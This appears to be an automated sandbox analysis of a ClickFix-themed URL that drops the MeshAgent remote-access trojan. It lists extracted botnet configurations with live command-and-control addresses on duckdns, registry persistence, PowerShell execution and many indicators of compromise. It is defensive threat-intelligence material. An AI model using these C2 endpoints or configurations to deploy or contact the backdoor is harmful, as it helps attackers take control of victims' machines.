meshagent | hxxps://kyberelu[.]rf[.]gd

Analysis

max time kernel
889s
max time network
897s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
08/04/2025, 16:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://kyberelu.rf.gd

Score

10^/10

meshagent clickfix steam backdoor discovery execution persistence rat trojan

Malware Config

Extracted

Family

meshagent

Version

Botnet

clickfix

http://aaso12.duckdns.org:443/agent.ashx

Attributes

mesh_id
0x950AE7E094D02F632FBC73D5C2419AAC81F9563B8A37915670D8453B94FB3DA11961008E153469470F365ACD78AB3512
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
wss
wss://aaso12.duckdns.org:443/agent.ashx

Extracted

Family

meshagent

Version

Botnet

steam

http://aaso12.duckdns.org:443/agent.ashx

Attributes

mesh_id
0xC48E7F90BF7E12FC41EC90364008D076F6C2461A7CED0869CAA7ADD17252A74A8118946EE0BB151DF78197A655B3C4C1
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
wss
wss://aaso12.duckdns.org:443/agent.ashx

Signatures

Detects MeshAgent payload 20 IoCs

resource	yara_rule
behavioral1/memory/3280-4775-0x00007FF7BD3A0000-0x00007FF7BD715000-memory.dmp	family_meshagent
behavioral1/memory/3280-4778-0x00007FF7BD3A0000-0x00007FF7BD715000-memory.dmp	family_meshagent
behavioral1/memory/3280-4779-0x00007FF7BD3A0000-0x00007FF7BD715000-memory.dmp	family_meshagent
behavioral1/memory/5580-4782-0x00007FF7BD3A0000-0x00007FF7BD715000-memory.dmp	family_meshagent
behavioral1/files/0x000900000002829a-4784.dat	family_meshagent
behavioral1/memory/5580-4788-0x00007FF7BD3A0000-0x00007FF7BD715000-memory.dmp	family_meshagent
behavioral1/memory/1816-4909-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp	family_meshagent
behavioral1/memory/1816-4912-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp	family_meshagent
behavioral1/memory/1816-4913-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp	family_meshagent
behavioral1/memory/2464-4945-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp	family_meshagent
behavioral1/memory/1816-4958-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp	family_meshagent
behavioral1/files/0x000a00000002829a-4962.dat	family_meshagent
behavioral1/memory/2464-4967-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp	family_meshagent
behavioral1/memory/1848-5047-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp	family_meshagent
behavioral1/memory/1848-5048-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp	family_meshagent
behavioral1/memory/1848-5258-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp	family_meshagent
behavioral1/memory/1848-5291-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp	family_meshagent
behavioral1/memory/1848-5292-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp	family_meshagent
behavioral1/memory/1080-5293-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp	family_meshagent
behavioral1/memory/1080-5294-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp	family_meshagent

MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent
Meshagent family
meshagent

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	s.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	ss.exe

Executes dropped EXE 2 IoCs

pid	Process
3092	MeshAgent.exe
4264	MeshAgent.exe

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Documents\desktop.ini	firefox.exe
File opened for modification	C:\Users\Public\desktop.ini	firefox.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	firefox.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\advapi32.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\iphlpapi.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\dll\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\symbols\exe\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\user32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ws2_32.pdb	MeshAgent.exe

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	s.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	ss.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
8	powershell.exe
392	powershell.exe
5556	powershell.exe
4732	powershell.exe
2904	powershell.exe
1028	powershell.exe
1572	powershell.exe
3796	powershell.exe

Checks processor information in registry 2 TTPs 34 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings	firefox.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
4380	chrome.exe
4380	chrome.exe
3796	powershell.exe
3796	powershell.exe
3796	powershell.exe
8	powershell.exe
8	powershell.exe
8	powershell.exe
392	powershell.exe
392	powershell.exe
392	powershell.exe
5556	powershell.exe
5556	powershell.exe
5556	powershell.exe
4732	powershell.exe
4732	powershell.exe
4732	powershell.exe
2904	powershell.exe
2904	powershell.exe
2904	powershell.exe
1028	powershell.exe
1028	powershell.exe
1028	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeShutdownPrivilege	4380	chrome.exe
Token: SeCreatePagefilePrivilege	4380	chrome.exe
Token: SeDebugPrivilege	776	firefox.exe
Token: SeDebugPrivilege	776	firefox.exe
Token: SeDebugPrivilege	776	firefox.exe
Token: SeDebugPrivilege	776	firefox.exe
Token: SeDebugPrivilege	776	firefox.exe
Token: SeDebugPrivilege	776	firefox.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	392	powershell.exe
Token: SeDebugPrivilege	5556	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	5556	powershell.exe
Token: SeIncreaseQuotaPrivilege	5556	powershell.exe
Token: SeSecurityPrivilege	5556	powershell.exe
Token: SeTakeOwnershipPrivilege	5556	powershell.exe
Token: SeLoadDriverPrivilege	5556	powershell.exe
Token: SeSystemtimePrivilege	5556	powershell.exe
Token: SeBackupPrivilege	5556	powershell.exe
Token: SeRestorePrivilege	5556	powershell.exe
Token: SeShutdownPrivilege	5556	powershell.exe
Token: SeSystemEnvironmentPrivilege	5556	powershell.exe
Token: SeUndockPrivilege	5556	powershell.exe
Token: SeManageVolumePrivilege	5556	powershell.exe
Token: SeDebugPrivilege	776	firefox.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe

Suspicious use of FindShellTrayWindow 61 IoCs

pid	Process
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
1848	ss.exe
1848	ss.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
4380	chrome.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe

